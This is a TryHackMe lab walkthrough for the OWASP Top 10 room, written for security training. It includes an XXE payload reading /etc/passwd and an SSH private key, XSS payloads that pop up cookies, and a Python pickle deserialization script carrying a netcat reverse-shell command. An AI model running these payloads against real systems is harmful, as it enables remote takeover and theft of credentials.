TryHackMe: OWASP Top 10 Writeup

This writeup is going to be based on the OWASP Top 10 room on TryHackMe. The challenges to this room are going to be released on a daily basis so that for 10 days one can focus on one of the Top 10 vulnerabilities whichever has been released for that day. I will try to add every vulnerability task to this article as soon as I complete it.

What is OWASP and what are the Top 10???

Coming to the OWASP Top 10, OWASP releases this document called OWASP Top 10 which consists of most critical security risks to web applications. There are many versions of this document released in the past as well. Going through this document would help any individual to develop a better insight regarding some of the major vulnerabilities on the web and not only how to exploit them but also how to protect yourself from those vulnerabilities.

Coming to this room, it does not require any prerequisite knowledge related to these vulnerabilities but one can easily develop some knowledge regarding them. Moving on let’s get started with the OWASP Top 10 room!

[Task 1] Introduction

  1. Injection
  2. Broken Authentication
  3. Sensitive Data Exposure
  4. XML External Entity
  5. Broken Access Control
  6. Security Misconfiguration
  7. Cross-Site Scripting
  8. Insecure Deserialization
  9. Components With Known Vulnerabilities
  10. Insufficient Logging and Monitoring

Tasks 2 and 3 are just related to VPN access and daily prize. So, nothing important here.

Injection

[Task 4] Injection

There are broadly two types of injection attacks:

  • SQL Injection: When you exploit some weakness in SQL or database implementation in a web application.
  • Command Injection: When you exploit the web app implementation at the system level and run system-level command.

Once such injection attacks are successfully performed, an attacker can easily access, modify or delete important data and sometimes confidential data as well.

Considering the protection from such attacks, the best way is to sanitize all the data coming in from every possible entry-point before it gets processed or executed.

[Task 5] Command Injection

[Task 6] Command Injection Practical

The task talks about a simple code snippet that is running behind the URL through which we will be performing command injection. Also, a few Windows and Linux commands are provided which can be tested while performing command injection.

Now, the most interesting part of PRACTICAL IMPLEMENTATION!!!!

First of all, deploy the machine and browse to the URL: http://<machine_ip>/evilshell.php which would look something like:

EvilCorp Shell Page

Hint: If you are still not able to find the answer try various single digit values and then try to correlate the correct value with the passwd file.

  1. What strange text file is in the website root directory?
  • This question asks about an odd file present in the web root directory. Keep in mind it is asking about the WEB ROOT directory and not the ROOT directory. With the command, pwd we get the result as /var/www/html which is the WEB ROOT directory. All that needs to be done here is just to run the ls command to get a list of all the files present in this directory and find the odd file out.

2. How many non-root/non-service/non-daemon users are there?

  • To determine the user on any Linux machine the best way is to take a look at the /etc/passwd file using the cat command. This file consists of all different accounts present on the system including root, service and daemon accounts. But the question is asking about non-root/non-service/non-daemon users on the system. To find such users we must understand the different account types that are present in the /etc/passwd file like root, users, services and daemons. Visit this link to understand the difference between service and daemon accounts. Moreover, in a passwd file, there are different types of shell assigned to users and many times no shell is assigned, we need to understand that as well. Read about such shell over here. Once, we understand all these things we can easily determine the number of non-root/non-service/non-daemon accounts on the system. Refer to this link to get an idea of various default accounts on the system.

Hint: If you are still not able to find the answer try various single digit values and then try to correlate the correct value with the passwd file.

3. What user is this app running as?

  • This is a very simple question and can be checked using whoami command.

4. What is the user’s shell set as?

  • We just need to correlate the current user's shell details in the /etc/passwd file.

5. What version of Ubuntu is running?

  • Another simple question that can be checked by a single command ls_release -a.

6. Print out the MOTD. What favorite beverage is shown?

  • This one was a bit confusing question as I did not know what MOTD meant. After some googling, I came to know MOTD stands for ‘Message of The Day’. The issue that I faced with this challenge was before Ubuntu 16 the MOTD was saved in /etc/motd file which was not present in this system as it is not running on version 16. But on other versions, the files related to MOTD are stored in the directory /etc/update-motd.d. We just need to cat the files present in this folder and go through them to find the answer to this question.

Hint: Check for a file named 00-header.

With this the Day 1 Injection Challenge completes and I’ll be back again tomorrow when Broken Authentication challenge begins!!!

Go to Top

July 15, 2020

Broken Authentication

[Task 7] Broken Authentication

  1. Authentication is the basic method that uses username and password to allow users access to the web application. Along with that session cookies are used to track users and their activities.
  2. Some of the major issues that lead to flaws in the authentication mechanism are:
  • Bruteforce attacks
  • Use of weak passwords
  • Weak session cookies

3. When such attacks are performed, an attacker can gain access to the user's personal data including personal files, financial details and others.

4. Some steps that can be taken to mitigate this kind of attack are:

  • Setting up an account lockout in case of multiple login failures.
  • Implementing multi-factor authentication.

[Task 8] Broken Authentication Practical

Now, we can start with the questions where we just need to register a new user as explained above on the deployed machine at hhtp://<machine_ip:8888 and get the flag. The login page would look something like this:

Image: Broken Authentication Challenge Home Page
  1. What is the flag that you found in darren’s account?
  • For this question, we just simply need to visit go to the user registration page and register with the username as ‘ darren’. Once registered, we need to log in with the same username and the password used while registering the new user. Doing so will lead us to the user’s homepage from where we can get the flag.

2. What is the flag that you found in arthur’s account?

  • Again we need to perform the same steps as we did in the previous step but with the username as ‘ arthur’.

With this, we can wrap up the Broken Authentication challenge. This challenge was really simple as there were no steps that were very difficult.

The next challenge is related to Sensitive Data Exposure, I will add the write-up for the same immediately after the 24-hour buffer ends for that!

Go to Top

July 16, 2020

Sensitive Data Exposure

[Task 9] Sensitive Data Exposure (Introduction)

[Task 10] Sensitive Data Exposure (Supporting Material 1)

  1. Database (eg. MySQL, MariaDB)
  2. Stored as files (called as “flat-files”)

In this challenge, we are going to work with flat-files. And, also one hint is provided that this flat-file is stored underneath the root directory.

Along with that, a few commands are provided that can be used to solve this challenge:

  1. file <filename>: Provides information regarding the file-type. In the context of this task, we need to find a file of file-type SQLite.
  2. sqlite3 <filename>: Access the SQLite file.
  3. SQLite commands:
  • .tables;: Gives a list of tables present in the database
  • PRAGMA table_info(<tablename>);: Provides the details of the columns in the mentioned table
  • SELECT * FROM <tablename>;: Print all the content of the table

[Task 11] Sensitive Data Exposure (Supporting Material 2)

Along with that, they have mentioned a tool called Crackstation which can be used to break this hash and retrieve the original password from the hash.

[Task 12] Sensitive Data Exposure (Challenge)

  1. We need to find a directory where information regarding some sensitive data is leaked.
  • For this task, we need to deploy the machine and try to look around the web app to find some sort of information leakage. The first point of information leakage on a website that should come to our mind should be comments in the source code of the web app. We can try going through different web pages and look for some comments. The homepage would look like:
Sense and Sensitivity Homepage

We can check the source code by right-clicking on the webpage and selecting the inspect element option. On the homepage, we don’t find anything that would prove to be helpful so we can move on to the login page and see that in the source code there is a comment that mentions the directory where changes are meant to be made. And this directory itself is the answer to the first question.

2. Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?

  • This task is pretty simple, we just need to navigate to the directory we found in the previous question. Over there, there is only one file that appears to be odd from the rest of the files and obviously, the name of that file is our answer.

Hint: It is a database file.

3. Use the supporting material to access sensitive data. What is the password hash of the admin user?

  • We can download that odd file and then try to perform all the database operations explained in task 9 on it. So, let’s begin with that:
  • To open the file we can use the command: sqlite3 <filename>
  • The next task would be to check the tables in the database: .tables Output:
 sqlite> .tables
sessions users
  • We can see two tables over there but only one is of our use which is users.
  • Now, we need to know in what order data is arranged in the table, so we can use the command: PRAGMA table_info(users); Output:
 sqlite> PRAGMA table_info(users);
0|userID|TEXT|1||1
1|username|TEXT|1||0
2|password|TEXT|1||0
3|admin|INT|1||0
  • From these details, we can see that the third column would be containing the password hashes that we need.
  • To extract the password we need to print the table ‘users’. And we can do that by using the query: sqlite> SELECT * FROM users;
  • From the printed table, we need the hash in the third column that belongs to ‘admin’ and submit it as the answer for the third question.

4. Crack the hash. What is the admin’s plaintext password?

  • This question is pretty simple as we just need to copy the hash value paste it at CrackStation and obtain the decrypted password which can be submitted as the password for this question.

5. Login as the admin. What is the flag?

  • As the question suggests, we just need to use the cracked password with the username ‘admin’ and log in. Once, logged in we can see the flag right in front of us!!!

With this, we complete the Sensitive Data Exposure challenge. As I said earlier, this challenge was pretty simple and didn’t take much time to solve as well.

Wait till tomorrow, when I’ll add the walkthrough XML External Entity challenge!!!

Go to Top

July 17, 2020

XML External Entity

[Task 13] XML External Entity

  1. In-band attack: Attacker gets an immediate response to XXE payload
  2. Out-of-band attack (blind XXE): Attacker has to reflect the output of the attack to some other file or their server

[Task 14] XML External Entity — eXtensible Markup Language

  1. XML consists of rules for encoding documents in a human and machine-readable format.
  2. It is platform independent.
  3. Changes can be made to an XML document without affecting data presentation.
  4. XML allows validations using DTD’s and Schema ensuring XML document is free from any syntax error.
  5. Syntax:
  • Every XML document starts with a XML Prolog <?xml version="1.0" encoding="UTF-8"?>
  • This determines the XML version and the encoding used, also this line is not compulsory.
  • Every XML document must have a ROOT element without which it would be considered invalid.
  • Every opening tag must be closed with an identical tag with a preceding /. Eg. <tag>Example</tag>

For the first time, in this task certain questions are added based on the theory which are given below:

  1. Full form of XML
  • The answer lies in the task’s name itself :P

2. Is it compulsory to have XML prolog in XML documents?

  • It’s optional

3. Can we validate XML documents against a schema?

  • That is how we ensure the XML document is free from any errors.

4. How can we specify XML version and encoding in XML document?

  • This is defined at the first line of the XML document and a specific term is given to that line

[Task 15] XML External Entity — DTD

DTD Example:

<!DOCTYPE note [ <!ELEMENT note (to,from,heading,body)> <!ELEMENT to (#PCDATA)> <!ELEMENT from (#PCDATA)> <!ELEMENT heading (#PCDATA)> <!ELEMENT body (#PCDATA)> ]> 

Some terms that one must know from above payload:

  1. The value next to !DOCTYPE is the ROOT element
  2. The term !ELEMENT is used to define an element such as it's type (eg. #PCDATA which means parsable character data) or the sub-elements which it consists (<!ELEMENT note (to,from,heading,body)>)

This task also contains a few questions and answers to them are pretty simple as we just need to add a ‘!’ before the term that is to be defined.

[Task 16] XML External Entity — XXE Payload

  1. ENTITY assignment
<!DOCTYPE replace [<!ENTITY name "feast"> ]>
<userInfo>
<firstName>falcon</firstName>
<lastName>&name;</lastName>
</userInfo>
  • In this payload, the main point that should be focused is the use of an entity for assignment purposes. It can understood as at the beginning of the payload the entity name has been defined as the value “feast”. Later, the same value is used for the value of lastName using the term &name;.

2. Payload to read system files

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>
  • The main purpose of using this payload is to access system files. This is done by defining the path of the system file for a read action. We will be using this payload for solving the challenges in the next task.

[Task 17] XML External Entity — Exploiting

XXE Homepage
  1. Try to display your own name using any payload.
  • This question is pretty simple as we just need to print our name using XXE. For this, we can use the first payload and simply change various values and test the payload like values of name', firstName or lastName.

2. See if you can read the /etc/passwd

  • This task is also really simple and we can use the second payload from the previous task and just run it on the deployed website.

3. What is the name of the user in /etc/passwd

  • This could be found out at the last line of the output from the previous question.

4. Where is falcon’s SSH key located?

  • For this question, we first need to know where the SSH key is stored on a Linux machine. After some googling, we can find the exact location and file in which this key is stored and that is /home/<username>/.ssh/id_rsa. We can change the username value and replace /etc/passwd in the second payload with this new path. And this new path itself is the answer to the question.

5. What are the first 18 characters for falcon’s private key

  • Once we execute the payload that we created in the last task, we can get falcon’s SSH key and from the same key, we need to take out the first 18 characters from the key and use them as the answer to the question.
  • P.S. Don’t make a silly mistake by copying those 18 characters from -----BEGIN RSA PRIVATE KEY----- as the actual key begins after this!!!

So, one more challenge is over and I’ll be back again tomorrow with the write-up for Broken Access Control!!!

Go to Top

July 18, 2020

Broken Access Control

[Task 18] Broken Access Control

In simple terms, a normal user when bypasses the required authentication and can access sensitive data it is called Broken Access Contol.

[Task19] Broken Access Control (IDOR Challenge)

The challenge today is based on the same logic. So, let’s begin:

We must deploy the machine first and then access the machine IP which would look something like:

broken_access_control_homepage

We are provided the username and password, using them we can log in and get a lousy text saying I am noot.

But other than that we can’t see anything else. So, how can the IDOR attack be performed? As explained earlier we can manipulate the values passed in the URL. The URL would look like: http://<machine_ip>/note.php?note=1 The only parameter that appears to be manipulated here is the value that is passed to note. We can test several values including negative numbers, 0 and other terms.

Hint: The value is a non-negative integer and less than 10!!!

As we access the right page, we can see the flag just waiting for us!

So, with this the today’s Broken Access Control challenge end. I’ll be back again tomorrow with a writeup for the Security Misconfiguration challenge. Till then, keep hacking!!!

Go to Top

July 19, 2020

Security Misconfiguration

[Task 20] Security Misconfiguration

  1. Improper permissions configuration
  2. Leaving unnecessary features enabled
  3. Using default credentials
  4. Improper error handling

Coming to this challenge, it focuses on Default Credentials. We are not provided any further details but once we deploy the machine, we can the webpage for a note-taking app.

Img. pensivenote_omepage

All that we have here is the username and password field, a link to change the password and another link to swap the theme.

The task earlier talked about default credential, so we can try different default credentials like:

Table. default credentials

But unfortunately, none of these work. We can try to analyze the JS files as well from the debugger but even there we can’t find anything. Next thing that can be tried is changing the password from the Change Password link:

Img. pensivenote_changepw

But to do so, we’d need the current username and password which we don’t know.

Almost after an hour or so, I thought of googling PensiveNote but no success over there as well. Then I thought to check the hint, where it says that we don't have the web app's source code but we can try to read the documentation for default credentials. After surfing through all the webpages of the web app, we can be pretty sure that the documentation is not on the box.

It took me another 1 hour to realize that, people sometimes use GitHub to store their web apps’ source code and documentation. So, we can go to GitHub and maybe search for Pensive Note over there. And the first repository that pops up belongs to NinjaJc01 who is the creator of this room as well. So, all we need to do next is to read the documentation (README.md) and obtain the much-awaited default credentials. Using these credentials we can login on the web app and get the flag!

As I said earlier, this box gave a realistic feel as there was no information on the box and it made us think one step beyond googling as well!!!

With this, we can conclude today’s challenge. Wait till tomorrow when I’ll add the walkthrough for the XXS challenge!!!

Go to Top

July 20, 2020

Cross-Site Scripting

[Task 21] Cross-Site Scripting

  1. Reflected XSS: This takes place when the victim clicks on some link that triggers this XSS.
  2. Stored XSS: When the XXS script is stored directly in the database of the web app.
  3. DOM-Based XSS: Document Object Model (DOM) is helpful to change the document’s structure, style and content. DOM XSS are the ones that are in the DOM.

Moving on to the questions, let’s deploy the machine and go to http://machine_ip/stored which would look like:

Img. xss_homepage

P.S. When I did this challenge the /reflected link was not working but it can be accessed from the /stored link as well.

We need to register with some username and password which will take us to the actual page where we can perform the attacks.

For these questions, once the correct action is performed we will be provided with a flag that is to be used the answer for that specific question:

  1. The first question wants us to craft a payload that can cause a popup saying “Hello”.
  • If we read the theory properly, then we can find a payload that does the same but prints “Hello World!”, we can simply modify that payload and use it.
<script>alert(“Hello”)</script>

2. Craft a payload to show a popup having the victim’s IP address.

  • We know that IP addresses are associated with the location of the user and for the same, in JavaScript, there is an object called window.location.hostname through which can capture the victim's IP address. We can use the same payload in previous question and modify it to complete this question.
<script>alert(window.location.hostname)</script>

The next few questions are based on stored XSS.

3. Insert some HTML tags in the comment box.

  • We can try to insert any HTML tag to get the flag like:
<p>paragraph</p>

4. Craft a payload to popup the cookies.

  • In JavaScript, cookies can be accessed by the object document.cookies and we can use the same along with script tags to get the flag for this answer.
<script>alert(document.cookies)</script>

5. Craft a payload to change “XSS Playground” to “I am a hacker”

  • This question was a bit tricky but not difficult. To complete this question, we can use the JavaScript object document.queryselector which returns the first element within the document that matches the specified selector. So, we need to first find the selector for "XSS Playground".
  • To do so, we can simply select the text “XSS Playground”, right-click and go to the Inspect Element option. Then we can see the id over there somewhat like:
Img. xss_playground_id

Now we have the object to select the required text, the text’s id and we can use the function textContent to change the text to whatever value we want and put all of that in a script tag.

<script>document.querySelector('#thm-title').textContent = 'I am a hacker'</script>
  • We can paste this in the comment box, verify that the text has changed and get the final flag as well.

So, here we complete the XSS challenge as well. And tomorrow I’ll add the walkthrough for Insecure Deserialization.

Go to Top

July 21, 2020

Insecure Deserialization

[Task 22] Insecure Deserialization

Usually, this vulnerability is not exploited much as it is on a case by case basis. Also, the success of this attack depends strongly on the skills of the attacker.

  1. Who developed the Tomcat application?
  • The answer to this question can be easily found out by googling Tomcat developer. You'll get a 3-word name.

Hint: Add The before the 3-word name if your answer is not being accepted.

2. What type of attack that crashes services can be performed with insecure deserialization?

  • This is one of the two attacks that are described above in this task.

[Task 23] Insecure Deserialization — Objects

It can be defined as the state is values that the object holds whereas the behavior of an object determines the functions that the object performs.

[Task 24] Insecure Deserialization — Deserialization

Now, insecure deserialization is the process when malicious data is entered by an attacker and it gets directly processed because of the absence of any kind of filtering or input validation.

  1. What is the name of the base-2 formatting that data is sent across a network as?
  • The answer to this question can be directly found by googling ‘base-2 format’.

[Task 25] Insecure Deserialization — Cookies

Cookies can be set using various programming languages like python or PHP. Different websites use different mechanisms to generate cookies.

  1. If a cookie had the path of webapp.com/login, what would the URL that the user has to visit be?
  • When cookies are declared, the path along which they are valid is also described. The URL on which the cookie is valid is present in the question itself.

2. What is the acronym for the web technology that Secure cookies work over?

  • HTTP only in its secure mode supports secure cookies.

Hint: What is the name of the secure mode of HTTP.

[Task 26] Insecure Deserialization — Cookies Practical

  1. Create an account
  2. Then right-click and select inspect element

Here, we can see all the cookies and their values:

Img. setting cookie
  1. 1st flag (cookie value)
  • In the cookies section, we can see a cookie named sessionid but it is in base 64 (at it ends with ==). So, we first need to decode it from base64. From the decoded value, we can find the required flag for this answer.

2. 2nd flag (admin dashboard)

  • Currently we are logged in as a user, to get the admin flag we need to change our account type to ‘admin’. This can be done by replacing the’user’ with ‘admin’ in the userType cookie in the cookies section. Once done, we can go to http://machine_ip/admin and find the flag on the page itself.

[Task 27] Insecure Deserialization — Remote Code Execution

For this task, we need to perform the following task:

  1. First, need to change our account type back to ‘user’ from previously set ‘admin’ and go to /myprofile page.
  2. There we need to click on Exchange you vim and then on Provide your feedback.
  3. To get an RCE shell, we need to start a listener. This can be done by executing the netcat command nc -nvlp 4444. Here, 4444 is the port on which we are listening.
  4. They have provided us a python script as well, that can help us establish an RCE connection from the target machine which is:
import pickle
import sys
import base64
command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat YOUR_TRYHACKME_VPN_IP 4444 > /tmp/f'
class rce(object):
def __reduce__(self):
import os
return (os.system,(command,))
print(base64.b64encode(pickle.dumps(rce())))
  • We need to replace YOUR_TRYHACKME_VPN_IP with our system’s local IP address that can be found out using ifconfig and would be something like 10.x.x.x. In this function, a command has been defined which is later used in the rce() class. This class is further base64 encoded, which is the value that we would get as output.
  • On executing this python script as python script.py, we will get byte stream as output from which we need only the data between the single quotes(').
  • Now all that we need to do is copy this value to ‘encodedPayload’ value in the website’s cookie section and refresh the page.
  • This will execute the rce payload and we will get an RCE shell on our listener.
  • To find where the flag is located, we can use the command: find / -name flag.txt 2> /dev/null. We can read the file and find the flag that can be used as the answer to this task's question.

With this, today’s challenge finishes. Tomorrow, I’ll add the walkthrough for Components with Known Vulnerabilities till then keep hacking!!!

Go to Top

July 22, 2020

Components with Known Vulnerabilities

[Task 28] Components with Known Vulnerabilities — Explanation

[Task 29] Components with Known Vulnerabilities — Exploitation

  1. Determine the version of the software, application or service.
  2. Try to find out various exploits related to that specific version on the web (eg. on exploit-db or rapid7)
  3. If required, make necessary adjustments to the exploit as per requirement.
  4. Try to implement the exploit.
  5. Debug if some issue is faced and try again. Else, look for some other exploits and start from step 2.
  6. If the exploitation succeeds, we can perform the task we want to.

[Task 30] Components with Know Vulnerabilities — Practical

First of all, we need to deploy the machine and visit http://machine_ip as usual. The webpage would look like:

Img. Bookstore Homepage

If it were a normal pentest, we would have looked for everything from the HTML code, JS file running in the background of the page to directory traversal. But as this challenge is focused on known vulnerabilities. We just need to find a service that can be exploited.

From the debugger, we can see there were 2 JS files, one for bootstrap v3.3.5 and the other for jquery v2.1.4 but we can’t find any promising exploit for these.

If we see on the lower-left corner of the web page, we can see a link to projectworlds. From this website, we can see that they have produced many different PHP projects. We can directly search for exploits related to projectworlds bookstore exploit as our target is one of their online bookstore projects.

In my case, I found this exploit. There are many other exploits available as well on the web. We can download them and try to use them for exploitation. For some codes, we may find documentation on how to use the script whereas for others we might need to figure out on our own how to use those scripts.

For the current case, we can download the Online Book Store 1.0 — Unauthenticated Remote Code Execution script and try to execute it.

We can try to determine how this script needs to be used by simply running the script without passing it any parameters.

tester@kali:~/Downloads$ python 47887.py 
usage: 47887.py [-h] url
47887.py: error: too few arguments

Here, we can see that to run the script we need to pass the URL as a parameter else use the -h switch to see the help section. So, let's run the script by passing the URL i.e. http://machine_ip as the parameter to this script. But an issue might come up like given below:

Img. RCE Error

This error was being generated because when the script asked to start the shell and we enter ‘y’ it was not able to define the character. We can try to check the script as well to determine if there is some issue with the script but nothing is wrong over there as well. So, it might be the issue of the compiler so, we can try to run the script with python3 and see if it works.

Img. RCE Exploit

As expected, it was the issue with the compiler as python compiler is for Python2.7 whereas python3 is for the latest Python3.0. Now the only thing that needs to be done is to run the command to get the word count of passwd file as asked in the question using the command wc -c /etc/passwd and enter the received value as the answer.

With this, we can complete today’s challenge. Tomorrow is going to be the last day and the last challenge that is Insufficient Logging and Monitoring. Wait till I add the walkthrough for that till then keep hacking!

Go to Top

July 23, 2020

Insufficient Logging and Monitoring

Logging also helps in the post-attack kind of scenarios as it enables us to see what all actions were performed by an attacker to execute the attack. With all that information we can improve our security and be prepared for any such attack in the future.

[Task 31] Insufficient Logging and Monitoring

  1. Logging helps to trace the actions performed by an attacker.
  2. Two major impacts of not having logging and monitoring could be:
  • Regulatory damage: When the user or client information gets leaked.
  • Risk of further attack: Organization might face the same attack and won’t know how to tackle it.

3. Some of the important information that should be logged are:

  • HTTP Status Codes
  • Time Stamps
  • Usernames
  • API endpoints/page locations
  • IP Addresses

4. Logs themselves contain sensitive information and hence must be stored securely.

5. Monitoring also helps to determine the severity of any anomaly taking place based on the information that has been logged.

Coming to the challenge, we need to download a log file which would look somewhat like:

200 OK           12.55.22.88 jr22          2019-03-18T09:21:17 /login
200 OK 14.56.23.11 rand99 2019-03-18T10:19:22 /login
200 OK 17.33.10.38 afer11 2019-03-18T11:11:44 /login
200 OK 99.12.44.20 rad4 2019-03-18T11:55:51 /login
200 OK 67.34.22.10 bff1 2019-03-18T13:08:59 /login
200 OK 34.55.11.14 hax0r 2019-03-21T16:08:15 /login
401 Unauthorised 49.99.13.16 admin 2019-03-21T21:08:15 /login
401 Unauthorised 49.99.13.16 administrator 2019-03-21T21:08:20 /login
401 Unauthorised 49.99.13.16 anonymous 2019-03-21T21:08:25 /login
401 Unauthorised 49.99.13.16 root 2019-03-21T21:08:30 /login
  1. What IP address is the attacker using?
  • From the logs it is pretty clear that there is one IP address that is trying to access unauthorized data that too with usernames that have higher privileges. The answer to this question is that IP itself.

2. What kind of attack is being carried out?

  • It can be seen that different usernames are being used to perform the attack. Also, as mentioned previously all of them are usernames that might have higher privileges. There is only one attack type in which we use a list of usernames and/or passwords to randomly guess the correct login credentials, that attack type is the answer to this question.

With this, we can conclude the OWASP Top 10 challenge. All of these challenges were very helpful in developing basic knowledge regarding the major vulnerabilities that are found out there in the wild. But as this was just a basic introduction to all these vulnerabilities, it is not easy to find them so easily in the real-world environment.

Wish you all the best for your future hacking!!!

Do check my entire GitHub Repository on various TryHackMe rooms at:

https://github.com/n00b-0x31/TryHackMe-Writeups

Just another CyberSec Guy